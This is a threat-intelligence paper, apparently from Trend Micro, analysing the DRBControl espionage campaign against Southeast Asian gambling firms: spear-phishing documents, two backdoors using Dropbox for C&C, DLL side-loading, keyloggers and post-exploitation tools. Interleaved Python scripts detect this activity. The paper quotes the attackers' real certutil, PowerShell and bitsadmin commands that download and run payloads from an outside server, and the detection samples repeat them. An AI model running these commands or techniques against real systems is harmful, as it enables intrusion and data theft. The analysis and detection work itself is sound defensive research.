**TREND MICRO LEGAL DISCLAIMER** The information provided herein is for general information and educational purposes only. It is not intended and should not be construed to constitute legal advice. The information contained herein may not be applicable to all situations and may not reflect the most current situation. Nothing contained herein should be relied on or acted upon without the benefit of legal advice based on the particular facts and circumstances presented and nothing herein should be construed otherwise. Trend Micro reserves the right to modify the contents of this document at any time without prior notice. Translations of any material into other languages are intended solely as a convenience. Translation accuracy is not guaranteed nor implied. If any questions arise related to the accuracy of a translation, please refer to the original language official version of the document. Any discrepancies or differences created in the translation are not binding and have no legal effect for compliance or enforcement purposes. Although Trend Micro uses reasonable efforts to include accurate and up-to-date information herein, Trend Micro makes no warranties or representations of any kind as to its accuracy, currency, or completeness. You agree that access to and use of and reliance on this document and the content thereof is at your own risk. Trend Micro disclaims all warranties of any kind, express or implied. Neither Trend Micro nor any party involved in creating, producing, or delivering this document shall be liable for any consequence, loss, or damage, including direct, indirect, special, consequential, loss of business profits, or special damages, whatsoever arising out of access to, use of, or inability to use, or in connection with the use of this document, or any errors or omissions in the content thereof. Use of this information constitutes acceptance for use in an "as is" condition.
Published by **Trend Micro Research**. Written by **Daniel Lunghi, Cedric Pernet, Kenney Lu, and Jamz Yaneza**. Stock image used under license from Shutterstock.com.

### Contents

- The Initial Compromise: Spear Phishing
- Malware Analysis
- Other Malware Families Used
- Post-Exploitation Tools
- Infrastructure Analysis
- Links with Known Threat Actors
- Conclusion

In the summer of 2019, Talent-Jump Technologies, Inc. contacted Trend Micro regarding a backdoor that they discovered after performing an incident response operation on a company based in the Philippines. Trend Micro provided further intelligence and context on this particular backdoor. An in-depth analysis revealed that the backdoor was being used by an advanced persistent threat (APT) actor that we dubbed "DRBControl," as we could not find anything related to the group in our databases or in public malware repositories. Our analysis also found that the threat actor uses a number of additional backdoors and post-exploitation tools, as well as spear-phishing documents that could have been used during the initial phase of a related campaign.

One of the backdoors was of particular interest, as it used the file hosting service Dropbox as a command-and-control (C&C) channel. We shared our analysis with Dropbox, which has since been working with Trend Micro on the issue.

We observed that the threat actor behind this campaign had very specific targets: it only goes after gambling and betting companies in Southeast Asia. We have been made aware that Europe and the Middle East are also being targeted, but we could not confirm this at the time of writing. The exfiltrated data consisted mostly of databases and source code, which leads us to believe that the campaign is used for cyberespionage or for gaining competitive intelligence.
Some of the backdoors were unknown to us, which could suggest that this is a previously unreported group. However, we also managed to link it to some known threat actors.

This research paper details the different stages of this campaign, including the initial spear-phishing emails, a detailed analysis of the backdoors, and a list of the multiple post-exploitation tools. It also covers observations on the threat actor's activities and infrastructure, including connections with known APT groups.

## The Initial Compromise: Spear Phishing

In targeted attacks, spear phishing is a common infection vector employed[1] by threat actors[2] looking to gain an initial foothold in their target's infrastructure. Obtaining the targets' email addresses is relatively easy, whether generic role addresses or the addresses of specific individuals. The campaign we expose in this research is no exception: the threat actors use spear phishing to trick the recipient into opening a .DOCX document.

The spear-phishing campaign we witnessed was active in May 2019. We found two kinds of phishing content that differed in language but were otherwise very similar. The social engineering used in this campaign appears to be quite straightforward and efficient in terms of meeting the threat actors' goals. The spear-phishing attack targets the organization's support team:

From: 2931436431@{BLOCKED}q[.]com
To: support-@

The subject changed depending on the language that the targeted support team uses. The support-cn team, for instance, received an email with the Chinese subject "注册不了的截图" ("cannot register screenshot"), while the support-jp team received a similar email with "error screenshot" as the subject. The documents are also displayed differently.

Figure 1. Spear-phishing document sent to the Japanese support team

Figure 2.
Spear-phishing document sent to the Chinese support team

Support teams are used to receiving requests from customers, and emails that contain screen captures from users may also be commonplace for these teams. However, support teams should be wary of how unusual it is for a user to send a .DOCX file that contains a screenshot and requires additional user action (a double-click, in this case) just to show the image.

We were able to find at least three different versions of the infecting documents. The first version embeds an executable file that, when double-clicked by the user, is launched and acts as a dropper for the malware (detected by Trend Micro as Trojan.Win32.CLAMBLING.A). A second version of the document embeds a .BAT file, which acts as a downloader for the same malware:

```
cd %temp% && certutil -urlcache -split -f http://{BLOCKED}.{BLOCKED}.18.154/debug.exe && debug.exe
```

Command-line content found in an infecting document, downloading and executing a second-stage malware

The third version of the document uses PowerShell to download the malware:

```
cmd /c start powershell.exe -ep Bypass -NoP -NonI -W Hidden (new-object System.Net.WebClient).DownloadFile('http://{BLOCKED}.{BLOCKED}.18.154/test.cab','%TEMP%\\test.cab'); expand '%temp%\\test.cab' %temp% -f:* ;Start-Process '%TEMP%\\config.exe'
```

Using PowerShell to download and execute a second-stage malware

Our analysis revealed that the first two versions execute the same file (detected as Trojan.Win32.CLAMBLING.A) on the infected system. We could not retrieve the test.cab file from the third version, but we suspect a similar final payload. In both command lines a signed, built-in Windows utility (certutil.exe, then powershell.exe with the execution policy bypassed and a hidden window) performs the download, so the documents themselves do not need to carry the payload.

Figure 3.
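The two command lines above are enough to write a first detection. The Python below is an added example written for this page, not code from the paper or from Trend Micro: it runs a few regular expressions over process command lines (as logged by Sysmon event 1 or Windows event 4688) and flags the certutil and PowerShell download cradles used here, and also the bitsadmin /transfer form that appears later in this paper under Links with Known Threat Actors. The sample command lines in the block are constructed for the demo; the IP address is kept redacted exactly as in the paper.

```python
"""Flag download-and-execute cradles in process command lines.

Added example for this page (not code from the paper). Sample command lines
below are constructed; the IP address is kept redacted as in the paper.
"""
import re

# Each rule is (name, regex). Case-insensitive because cmd.exe and PowerShell
# ignore case and the attacker controls the spelling.
RULES = [
    # certutil.exe abused as a downloader: -urlcache -split -f <url>
    ("certutil_urlcache",
     re.compile(r"\bcertutil(?:\.exe)?\b.*-urlcache\b.*-f\b", re.I)),
    # bitsadmin.exe /transfer <job> <url> <local path>
    ("bitsadmin_transfer",
     re.compile(r"\bbitsadmin(?:\.exe)?\b.*/transfer\b.*https?://", re.I)),
    # PowerShell with execution policy bypass and a WebClient/IWR download
    ("powershell_downloadfile",
     re.compile(r"\bpowershell(?:\.exe)?\b"
                r"(?=.*-ep\s+bypass)"
                r"(?=.*(?:DownloadFile|DownloadString|Invoke-WebRequest|\biwr\b))",
                re.I)),
    # expand.exe unpacking a .cab that is then started
    ("cab_expand_then_run",
     re.compile(r"\bexpand\b.*\.cab\b.*(?:Start-Process|\bstart\b)", re.I)),
]

URL_RE = re.compile(r"https?://[^\s'\"]+", re.I)


def classify(cmdline):
    """Return the names of the rules that match one command line and the
    URLs it contains (useful as IoCs once a hit is confirmed)."""
    return {
        "rules": [name for name, rx in RULES if rx.search(cmdline)],
        "urls": URL_RE.findall(cmdline),
    }


def scan(cmdlines):
    """Yield (line_number, cmdline, classification) for every line that hits
    at least one rule; line numbers start at 1."""
    for n, line in enumerate(cmdlines, 1):
        c = classify(line)
        if c["rules"]:
            yield n, line, c


# Constructed sample: two benign admin command lines, then the three cradles.
SAMPLE_CMDLINES = [
    r"certutil -hashfile C:\Users\alice\report.docx SHA256",
    r'powershell.exe -Command "Get-Service | Where-Object Status -eq Running"',
    r"cmd.exe /c cd %temp% && certutil -urlcache -split -f "
    r"http://{BLOCKED}.{BLOCKED}.18.154/debug.exe && debug.exe",
    r"cmd /c start powershell.exe -ep Bypass -NoP -NonI -W Hidden "
    r"(new-object System.Net.WebClient).DownloadFile("
    r"'http://{BLOCKED}.{BLOCKED}.18.154/test.cab','%TEMP%\test.cab'); "
    r"expand '%temp%\test.cab' %temp% -f:* ;Start-Process '%TEMP%\config.exe'",
    r"bitsadmin /transfer n http://185.173.92[.]141:33579/t32d.exe "
    r"c:\users\public\wget.exe",
]


def demo():
    """Run the scan over the constructed sample; returns [(line_no, rules)]."""
    return [(n, c["rules"]) for n, _line, c in scan(SAMPLE_CMDLINES)]


if __name__ == "__main__":
    for n, line, c in scan(SAMPLE_CMDLINES):
        print(f"line {n}: {', '.join(c['rules'])}  urls={c['urls']}")
```

The benign certutil -hashfile and the plain PowerShell query do not trigger anything, while each cradle hits its rule (the PowerShell line hits two, since the .cab expansion followed by Start-Process is a second indicator on its own). In production the URL list is what you feed into blocklists and retro-hunts once an analyst has confirmed a hit.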
Malicious document that tricks the user into double-clicking on the picture and running malicious code (top: "Registration information error picture"; bottom: "Double-click to enlarge picture")

We also found a weaponized document from July 2017 that used similar PowerShell code to drop a backdoor (analyzed later in this research as type 2), but we could not find it in our telemetry. It likewise tricked the user into double-clicking on an image, which triggers the code execution.

## Malware Analysis

This campaign uses two major backdoors that were previously unknown to us. We also found some known malware families, such as PlugX and HyperBro, as well as many custom post-exploitation tools. Below we describe the loading, persistence, and features of the two backdoors.

##### Type 1 Backdoor

###### Loading the Payload

This backdoor is written in C++ with classes that inherit from virtual classes. The backdoor is also modular, allowing for expansion through plug-ins.

###### Current Method: DLL Side-Loading

To load this backdoor, the threat actor launches the legitimate file MsMpEng.exe, which is signed by Microsoft and described as an "Antimalware Service Executable." This executable is vulnerable to DLL side-loading,[3] wherein an unintended DLL is loaded by a program. In this case, the malicious actor takes advantage of it by storing a file named mpsvc.dll in the same directory. That DLL then opens a third file, mpsvc.mui, which contains the obfuscated backdoor, decodes it, and loads it into a svchost.exe process. The executable keeps its valid Microsoft signature throughout, so signature checks alone do not catch this; what matters is the directory MsMpEng.exe runs from and which mpsvc.dll it loaded.

We found two RAR archives (detected as Trojan.Win64.CLAMBLING.A) in the wild containing the aforementioned files. The modification time of the embedded files is 2019-07-25.

###### Old Method: Patching of a Legitimate File

Interestingly, we observed a different technique being used in an older version of this backdoor.
The threat actor manually patched some bytes of a legitimate installer for the Chinese archiving software "HaoZip" (commonly used in China as an alternative to WinRAR and WinZip) to redirect the code flow to a function appended at the end of the binary.

Figure 4. Legitimate HaoZip installer code

Figure 5. Patched code that redirects the execution flow

The added function resolves pointers to several WinAPI functions by comparing their names against hashes generated by a simple custom algorithm. The code then loads the binary overlay into memory, which contains a routine to decompress and load the final payload. The routine also checks whether the process is being debugged by comparing the byte at offset 2 of the PEB (the BeingDebugged flag) with 0.

Figure 6. Debugger check via PEB

###### Backdoor Features

The dropped payload is a backdoor written in C++. It embeds a cleartext configuration that contains the C&C, the path to which the file will be copied, and the name of the service that will be created. If no arguments are provided, the file is copied to the path specified in the configuration, its attributes are set to system and hidden, and a value is added to a "Run" registry key to launch it at the next boot.

Figure 7.
AutoRun addition

It handles the following arguments:

- P: Create a suspended svchost.exe process, inject code into it, and resume it
- O: Initialize plug-ins and backdoor features
- U: Bypass user account control (UAC) with the passuac.dll file

Run-time type information (RTTI) is present in the executable, allowing us to recover the real class names:

- CHPPlugin: Virtual class implemented by every "plug-in" class
- CHPCmd: Class handling command execution through the terminal
- CHPExplorer: Class providing functions to browse directories, enumerate network shares, and read, write, and execute files
- CHPAvi: Class providing screen recording in AVI format and AVI file enumeration
- CHPKeyLog: Class providing the keylogging feature (discussed later)
- CHPPipe: Class providing functions that handle named pipes
- CHPProcess: Class providing functions to enumerate and terminate processes
- CHPProxy: Class adding proxy support
- CHPRegedit: Class providing functions to handle registry keys (enumerate, copy, set, delete)
- CHPScreen: Class handling the screenshot capture feature
- CHPService: Class providing functions to handle services (create, delete, modify, query, start)
- CHPNet: Virtual class implemented by every "communication protocol" class
- CHPHttp: Network class handling the HTTP protocol
- CHPTcp: Network class handling the TCP protocol
- CHPUdp: Network class handling the UDP protocol
- CHPTelnet: Network class handling the Telnet protocol

The malware also sends the following information about the infected system to the C&C server:

- Hostname (or IP address if no hostname is found)
- Computer name
- Current privileges (System/Admin/User)
- Windows version
- Current time
- Fixed string (likely the campaign identifier)

Before sending, the data is obfuscated by replacing each character with its position in a fixed substitution table.

Figure 8.
Substitution algorithm

###### The Use of Dropbox in Its Infection Chain

An important feature appeared in the recent version of this backdoor: a new thread that adds a second C&C channel using the Dropbox API. The thread waits 30 minutes before doing anything, then gathers the following information about the host:

- Local IP address
- Computer name
- Username
- Operating system (OS) version
- Malware version (fixed string; we saw values ranging from 1.0 to 9.0)
- Content of the registry value HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-Qt\strDataDir, with "wallet.dat" appended
- Existence: "YES" if the wallet file exists, "NO" otherwise

This information is written in plain text to Dropbox through the API, in a file named with the current date and time. The malware then searches for a file named bin.asc in a specific Dropbox directory. If this file exists, the malware checks that it starts with "GIF", then decrypts the rest of it, starts a suspended svchost.exe process, writes the decrypted shellcode into it, and resumes its execution. We found different payloads being delivered through Dropbox; these are covered in a separate section below.

It is worth noting that the threat actor used multiple Dropbox repositories, each storing different information. They were split as follows:

- Backdoor and storage of the target user's workstation information
- Storage of commands, results, heartbeats, and post-exploitation tools
- Stolen files from the target user's computer

The versioning shows the malware's rapid pace of development: version 1.0 was used in late May 2019, version 8.0 in late July 2019, and version 9.0 at the beginning of October 2019.
Figure 9. Code flow of the latest version of the backdoor (DLL side-loading from MsMpEng.exe; loader and MUI file unpacked in memory and injected into svchost.exe; first C&C channel connects and waits for commands; information gathering and upload to Dropbox; second channel fetches further payloads from Dropbox, unpacked and executed in svchost.exe, with remote control via Dropbox)

###### Keylogger Feature

Keystrokes are logged to the file %USERPROFILE%\AppData\Roaming\(IID).log, while the clipboard is stored in the file %USERPROFILE%\AppData\Roaming\(IID).pas. Both are obfuscated with a very simple algorithm:

Figure 10. Keylogger encryption algorithm

After decryption, the files look like this:

Figure 11. Sample of logged keystrokes

Figure 12. Sample of a logged clipboard

It is worth noting that the first sample we found has no campaign name or version number, and the Dropbox feature is not present. It also embeds only two plug-ins (CHPCmd and CHPExplorer) and two network plug-ins (CHPTcp and CHPHttp), and does not implement the UAC bypass feature. This is the sample that we found being dropped by the spear-phishing documents. It should also be noted that the check for Bitcoin wallets was removed in version 9.0.

##### Dropbox-Downloaded Backdoor

As mentioned above, further payloads are delivered through Dropbox. The first such backdoor we retrieved itself uses Dropbox as its C&C channel. It handles the following commands:

- 0x02: Enumerates drives
- 0x03: Enumerates files
- 0x04: Executes a file and sends the output to the C&C
- 0x05: File operation:
  - 0x01: Move
  - 0x02: Copy
  - 0x03: Delete
  - 0x04: Rename
- 0x06: Uploads a file to Dropbox
- 0x07: Downloads a file from Dropbox
- 0x08: Executes a command via the console
- 0x09: Runs a binary through process hollowing

When starting, a machine ID is generated and stored in HKEY_LOCAL_MACHINE\Software\Classes\CLSID\.
A directory is also created in Dropbox, which is used to store files harvested from the victim. The code uses three hardcoded filenames:

- yasHPHFJ: Contains commands to execute
- Csaujdnc: Contains the result of the execution
- eLHgZNBH: Heartbeat

##### Dropbox-Downloaded Backdoor Loader

Since the Dropbox-downloaded backdoor is loaded into memory by the type 1 malware, it cannot run on its own. Consequently, we found another malware family whose sole purpose is to run those Dropbox backdoors. This loader also uses the DLL side-loading technique,[4] this time abusing a weakness in some versions of the legitimate Windows service IKEEXT, which is used for IPsec connections.[5, 6] On those versions the service attempts to load a DLL named wlbsctrl.dll that the system does not ship, searching the directories in the PATH variable, so any PATH directory the actor can write to is enough to plant it. We saw the actor copying a malicious wlbsctrl.dll file to the following directories:

- C:\ProgramData\Oracle\Java\javapath\
- C:\ProgramData\
- C:\Users\Administrator\AppData\Roaming\npm\
- C:\ProgramData\GooGet\
- C:\php\
- C:\Windows\System32\

The code is very short: the malware retrieves pointers to some specific functions, parses the header of the file to be loaded looking for some pointers, and passes them all as arguments to the Dropbox backdoor.

Dropbox has since clarified that the tokens concerned were expired in August.

##### Communication Redirection

We found a related sample that implements some of the classes mentioned earlier plus a few more:

- CHPHttp
- CHPNet
- CHPTcp
- CHPUdp
- CHPListener: Virtual class implemented by network listeners
- CTcpListener: Class redirecting TCP communications
- CUdpListener: Class redirecting UDP communications

This sample works as a network redirector and interprets four parameters:

- l: Listen port
- p: Remote server IP address
- r: Remote server port
- m: Protocol (TCP or UDP)

Traffic of the given protocol arriving on the listen port is forwarded to the remote IP address and port, which lets the actor pivot C&C traffic through a compromised host that can reach the internet.
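Both side-loading set-ups described so far (mpsvc.dll next to a copy of MsMpEng.exe, and wlbsctrl.dll dropped into a PATH directory for IKEEXT) can be hunted with a plain file-system sweep. The Python below is an added example, not code from the paper or from Trend Micro: it builds a constructed directory layout in a temporary folder so that it runs on any OS, then applies the two checks to it. The Defender install path, the staging directory name `Updater`, and the PATH entries used in the demo are assumptions for the demonstration; on a real host you would pass the machine's actual PATH entries and the genuine Windows Defender directory instead.

```python
"""Hunt for the two DLL side-loading set-ups described above.

Added example for this page (not code from the paper). Runs against a
constructed directory tree in a temporary folder so it works on any OS;
on a Windows host pass the real PATH entries and the real Defender directory.
"""
import os
import tempfile
from pathlib import Path


def _same_dir(a, b):
    """Compare two directory paths the way Windows does (case-insensitive)."""
    return os.path.normcase(os.path.abspath(a)) == os.path.normcase(os.path.abspath(b))


def find_ikeext_sideload(path_dirs):
    """Return every wlbsctrl.dll sitting directly in a PATH directory.

    IKEEXT on the affected Windows versions looks for this DLL along PATH and
    the system does not ship one, so any hit deserves a look.
    """
    hits = []
    for d in path_dirs:
        p = Path(d)
        if not p.is_dir():
            continue
        hits.extend(str(f) for f in p.iterdir() if f.name.lower() == "wlbsctrl.dll")
    return hits


def find_msmpeng_sideload(roots, allowed_dirs):
    """Walk the roots and report every directory holding MsMpEng.exe together
    with an mpsvc.dll, unless it is one of the allowed (genuine Defender)
    directories. Other files next to the pair are listed as companions, since
    the payload lives in a sibling file (.mui, fake .rtf, thumb.dat) in the
    cases described on this page.
    """
    hits = []
    for root in roots:
        for dirpath, _dirs, files in os.walk(root):
            low = {f.lower() for f in files}
            if {"msmpeng.exe", "mpsvc.dll"} <= low and not any(
                _same_dir(dirpath, a) for a in allowed_dirs
            ):
                hits.append({
                    "dir": dirpath,
                    "companions": sorted(low - {"msmpeng.exe", "mpsvc.dll"}),
                })
    return hits


def build_demo_tree(base):
    """Constructed layout (assumptions for the demo): a genuine Defender
    directory, a staged copy under ProgramData\\Updater with an mpsvc.mui
    payload, and a wlbsctrl.dll planted in the Java PATH directory."""
    defender = base / "Program Files" / "Windows Defender"
    staged = base / "ProgramData" / "Updater"
    javapath = base / "ProgramData" / "Oracle" / "Java" / "javapath"
    system32 = base / "Windows" / "System32"
    for d in (defender, staged, javapath, system32):
        d.mkdir(parents=True)
    for name in ("MsMpEng.exe", "mpsvc.dll"):
        (defender / name).write_bytes(b"MZ")
    for name in ("MsMpEng.exe", "mpsvc.dll", "mpsvc.mui"):
        (staged / name).write_bytes(b"MZ")
    (javapath / "wlbsctrl.dll").write_bytes(b"MZ")
    (system32 / "kernel32.dll").write_bytes(b"MZ")
    return {
        "path_dirs": [str(system32), str(javapath)],
        "allowed_dirs": [str(defender)],
    }


def demo():
    """Build the tree, run both checks, and return base-relative findings."""
    with tempfile.TemporaryDirectory() as tmp:
        base = Path(tmp)
        layout = build_demo_tree(base)
        ike = find_ikeext_sideload(layout["path_dirs"])
        mp = find_msmpeng_sideload([str(base)], layout["allowed_dirs"])
        return {
            "ikeext": [Path(p).relative_to(base).as_posix() for p in ike],
            "msmpeng": [(Path(h["dir"]).relative_to(base).as_posix(), h["companions"])
                        for h in mp],
        }


if __name__ == "__main__":
    print(demo())
```

The genuine Defender directory also contains MsMpEng.exe and mpsvc.dll, which is exactly why the check keys on location rather than on file names alone; the staged copy under ProgramData is reported together with its mpsvc.mui companion, and the planted wlbsctrl.dll is reported on its own. Note that the "dir wlbsctrl.dll" command the attacker runs on compromised hosts (see Table 1 below) is the manual version of the same check.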
The compilation timestamp of this sample is 2019-08-24.

##### Type 2 Backdoor

###### Loading the Payload

The second backdoor type that we found is also written in C++. To unpack it, the threat actor uses the same Microsoft executable that is vulnerable to DLL side-loading as in the type 1 backdoor. A compressed and obfuscated version of the backdoor is stored in a file with a fake .RTF extension. That file is loaded and unpacked by a specially crafted mpsvc.dll, which is in turn loaded by the Microsoft-signed MsMpEng.exe.

###### Backdoor Features

This backdoor uses a configuration file that contains information such as the C&C domain and port, the directory and filename to which the malware is copied, and the name and description of the service created for persistence. The configuration is obfuscated by a simple algorithm embedded in the PE file.

Figure 13. Config decryption routine

When the malware is first run, the obfuscated configuration is appended to a randomly generated GUID and stored in the CFG value of the HKLM (or HKCU)\SOFTWARE\Plus registry key.

When the backdoor is run without arguments, it creates a copy of itself in the directory specified in the configuration file. The malware then sets up its persistence mechanism. Depending on the user's privileges, it either creates a service or adds a value under the HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run registry key to run itself with the -PO argument. If necessary, it also runs itself with the -UC argument to bypass UAC.
The following arguments are handled (one at a time):

- PO: Injects the backdoor into svchost.exe via process hollowing and runs it with the "-OE" argument
- OE: Initializes all plug-ins and starts communication with the C&C; one of the threads runs the backdoor with the -KG argument in every RDP session
- UC: UAC bypass
- KG: Keylogging feature initialization (discussed later)

As with the type 1 backdoor, RTTI is available in this sample. The following classes were observed:

- CNet: Virtual class implemented by the other network-related classes
- CNetHttp: Class related to the HTTP communication protocol
- CNetTcp: Class related to the TCP communication protocol
- CPlugin: Virtual class implemented by the other classes
- CFileManager: Class related to file handling (read, write, list, execute, etc.)
- CKeylog: Class related to the keylogging feature (discussed later)
- CMuture: Class handling console input and output
- CPortMap: Class handling socket binding
- CShell: Class handling command execution via cmd.exe; input and output are handled through named pipes

###### Keylogger Feature

A thread makes sure that the backdoor runs with the "-KG" parameter inside every RDP session.

Figure 14. Backdoor set to run with the "-KG" parameter

A file named %USERNAME%.rpt is created in the same directory as the malware, using this output format: %username% | [YYYY-mm-dd HH:MM:sss] | | . The file is obfuscated before being written to disk using a simple algorithm:

Figure 15. %Username%.rpt obfuscation routine

We found three samples related to this backdoor. The only difference between them was the embedded configuration file. The samples, together with their C&Cs, file paths, and service names, can be found in the IoCs.

We also discovered an old version of this backdoor being dropped by a weaponized Microsoft Word document from July 2017. The C++ classes were named similarly. This suggests that DRBControl is not a newcomer.
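The type 2 backdoor leaves two registry traces that are easy to audit: the Run value that relaunches it with the -PO (or -UC) switch, and the CFG value under SOFTWARE\Plus holding the GUID-prefixed obfuscated configuration. The Python below is an added example, not code from the paper or from Trend Micro: it audits a list of (key, value name, data) tuples such as a parsed `reg export` or a forensic hive parser would produce. It goes slightly beyond the type 2 backdoor by also checking for the HKCU mscfile handler key planted by the eventvwr.exe UAC bypass, one of the publicly known bypasses this actor's tools implement (covered under Post-Exploitation Tools); that check relies on the documented behaviour of the bypass, not on anything specific to this campaign. The registry entries in the block are constructed, and the path C:\ProgramData\Updater\svc.exe is a placeholder, not an IoC from the paper.

```python
"""Audit exported registry values for the persistence and UAC-bypass
artefacts described on this page.

Added example for this page (not code from the paper). Input is a list of
(key, value_name, data) tuples such as a parsed `reg export` or a forensic
hive parser would give; the entries in SAMPLE_ENTRIES are constructed.
"""
import re

HIVE = r"(?:HKEY_CURRENT_USER|HKEY_LOCAL_MACHINE|HKCU|HKLM)"

# Run keys (including the WOW64 view on 64-bit systems).
RUN_KEY_RE = re.compile(
    HIVE + r"\\Software\\(?:Wow6432Node\\)?Microsoft\\Windows\\CurrentVersion\\Run$", re.I)
# Type 2 backdoor: GUID + obfuscated config cached in SOFTWARE\Plus, value CFG.
PLUS_KEY_RE = re.compile(HIVE + r"\\SOFTWARE\\Plus$", re.I)
# eventvwr.exe UAC bypass: the auto-elevated Event Viewer resolves the .msc
# handler through HKCU\Software\Classes\mscfile before the machine-wide
# classes, so this key should normally not exist under HKCU at all.
MSCFILE_KEY_RE = re.compile(
    r"(?:HKEY_CURRENT_USER|HKCU)\\Software\\Classes\\mscfile\\shell\\open\\command$", re.I)
# -PO / -UC switches the type 2 backdoor is relaunched with.
BACKDOOR_ARG_RE = re.compile(r"(?:^|\s)[-/](?:PO|UC)(?:\s|$)", re.I)


def check_entry(key, value_name, data):
    """Return the list of rule names that one registry value triggers."""
    hits = []
    if RUN_KEY_RE.search(key) and BACKDOOR_ARG_RE.search(data):
        hits.append("run_with_backdoor_args")
    if PLUS_KEY_RE.search(key) and value_name.upper() == "CFG":
        hits.append("plus_cfg_cache")
    if MSCFILE_KEY_RE.search(key):
        hits.append("mscfile_hijack")
    return hits


def audit(entries):
    """Return [(key, value_name, rules)] for every entry that hits a rule."""
    findings = []
    for key, value_name, data in entries:
        rules = check_entry(key, value_name, data)
        if rules:
            findings.append((key, value_name, rules))
    return findings


# Constructed sample. The svc.exe path is a placeholder, not an IoC from the
# paper; b.bat is the batch file name the paper reports the loaders launching.
SAMPLE_ENTRIES = [
    (r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run", "OneDrive",
     r'"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'),
    (r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run", "SecurityHealth",
     r"C:\Windows\system32\SecurityHealthSystray.exe"),
    (r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run", "svchost",
     r'"C:\ProgramData\Updater\svc.exe" -PO'),
    (r"HKEY_LOCAL_MACHINE\SOFTWARE\Plus", "CFG", "c0ffee...(GUID + obfuscated config)"),
    (r"HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command", "",
     r"C:\Windows\System32\cmd.exe /c c:\programdata\b.bat"),
]


def demo():
    """Audit the constructed sample; returns [(value_name, rules)]."""
    return [(name, rules) for _key, name, rules in audit(SAMPLE_ENTRIES)]


if __name__ == "__main__":
    for key, name, rules in audit(SAMPLE_ENTRIES):
        print(f"{key}\\{name or '(Default)'}: {', '.join(rules)}")
```

The two legitimate Run values pass, the value that relaunches a binary with -PO is reported, the Plus\CFG cache is reported by itself, and the mscfile key is reported regardless of its content because its mere presence under HKCU is the indicator. The argument match deliberately requires the switch to be a whole token, so a path such as C:\Tools\PO\app.exe does not trigger it.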
## Other Malware Families Used

We found several other malware families related to DRBControl, a mix of widely known and less common malware.

##### PlugX RAT

We found a variant of the well-known PlugX malware using the same C&C as a type 1 backdoor sample from the campaign. The hardcoded version number in the binary is "0x20120123" and the configuration block is 0x150C bytes long. The C&Cs are www.kkxx88866[.]com and www.betwln520[.]com, and the file is copied to the %ALLUSERSPROFILE%\Mico directory. Some strings from the regular PlugX have been slightly modified, likely in an attempt to evade simple detection rules: for example, "JoProcBroadcast" became "J0Pr0cBr0adcast" and "OlProcNotify" became "0lPr0cN0tify" (the letter "o" replaced by the digit "0").

The malware is also dropped via DLL side-loading, although this time the vulnerable file is a legitimate Chrome installer that loads a malicious goopdate.dll file.[7, 8] This DLL decrypts, decompresses, and loads a third file named license.rtf, which is the final PlugX payload. The similar naming is yet another link to the TTPs of DRBControl.

The malware was found because of the shared infrastructure, but we have no insight into how or when it was used. Some hints point toward a very old sample: we found it in a .ZIP file named KB3023607.zip, which refers to a fix that Microsoft issued in February 2015,[9] and the compilation date of the unpacked sample is 2015-10-14. However, the modification date of license.rtf in the ZIP file is 2018-08-10, and it seems that no IP address was assigned to the C&C domains until March 2018.

##### Trochilus RAT

Two samples belonging to the Trochilus RAT family can be linked to domain names that DRBControl used.
The samples are Nullsoft Scriptable Install System (NSIS) installers that drop two files: rpcss.dll and data.dat, the latter being the backdoor in encrypted form.

Both samples copy the files to %ALLUSERSPROFILE%\Medialoader and, if running with admin privileges, create a service named medialoader that runs the DLL at boot time.

The setup443.exe file was hosted at hxxp://juchaoba[.]com/plus/guestbook/images/setup443.exe. We speculate that the site was compromised to host the file.

The diskshawin.exe file is dropped by an SFX RAR archive, which drops three files (run64.bat, csres.exe, and diskshawin.exe) into %SystemRoot%\Fonts and launches run64.bat. Csres.exe is a custom installer which, based on the user's privileges, will either create a service named SESSRV, use a UAC bypass, or simply run the malware during every RDP session. This installer creates several mutexes that have been seen in other known malware families linked to domain names reportedly used by the Winnti group.[10] We discuss this later in the Links with Known Threat Actors section.

##### MFC Keyloggers

We also found two additional malware samples that use the Microsoft Foundation Class (MFC) library and have links to the domain name shopingchina[.]net used in this campaign. Their purpose is to capture clipboard and keystroke data and send it to a PHP script hosted on the C&C.

##### HyperBro

The custom in-memory HyperBro backdoor[11] is also part of DRBControl's arsenal. Loading the payload is similar to the type 1 backdoor, abusing a legitimate Microsoft executable, but this time the MsMpEng.exe executable is a 32-bit file. The encrypted backdoor is stored in a file named thumb.dat, which is decrypted and loaded by the mpsvc.dll file. An additional config.ini file contains a GUID.
By looking at the RTTI class names, we found classes that were not present in a Palo Alto blog post[12] on HyperBro:

- VTClipboardInfo
- VTClipboardMgr
- VTFileRename
- VTFileRetime
- VTKeyboardInfo
- VTKeyboardMgr
- VTRegeditKeyInfo
- VTRegeditMgr
- VTRegeditValueInfo

The class VTFileDataRes was removed, and the URI pattern used to contact the C&C changed from "/ajax" to "/api/v2/ajax". Another difference was the compiler options: our sample did not use a stack cookie (/GS in Visual Studio). The sample contained a hardcoded version number and date of 2.0.9 and "Feb 04 2015."

From an infrastructure point of view, the C&C had striking similarities with the more recent C&C used by the type 1 backdoor, which led us to believe that this sample is related to DRBControl.

##### Cobalt Strike

We also found a Cobalt Strike sample linked to the cdn[.]kkxx888666[.]com subdomain. The same domain name has been used by an old type 1 backdoor and a PlugX sample.

## Post-Exploitation Tools

During our research, we found several other tools used by DRBControl. Among its arsenal were a clipboard stealer whose output is encrypted with the same algorithm as the type 1 backdoor; a network traffic tunnel named EarthWorm;[13] a public IP address retriever;[14] the NBTScan tool for enumerating NetBIOS names and shares;[15] a brute-force tool; and a privilege escalation tool exploiting CVE-2017-0213.[16] We also discovered password dumpers, UAC bypass tools, and code loaders among the post-exploitation tools.

##### Password Dumpers

We found multiple password dumpers in DRBControl's toolkit. Some of them were known, such as Quarks PwDump and modified versions of Mimikatz that only dump logon passwords. Others are based on publicly available source code.[17, 18] Based on its PDB path, the latter was named NetPwdDump by the malicious actor. Another tool dumps the SQLite data stored in the "\Google\Chrome\User Data\Default\Login Data" file.
##### UAC Bypass

Many samples were simple implementations of publicly known UAC bypass techniques, including bypasses via elevated .NET applications,[19] Win7Elevate,[20] and eventvwr.exe registry hijacking.[21]

##### Code Loaders

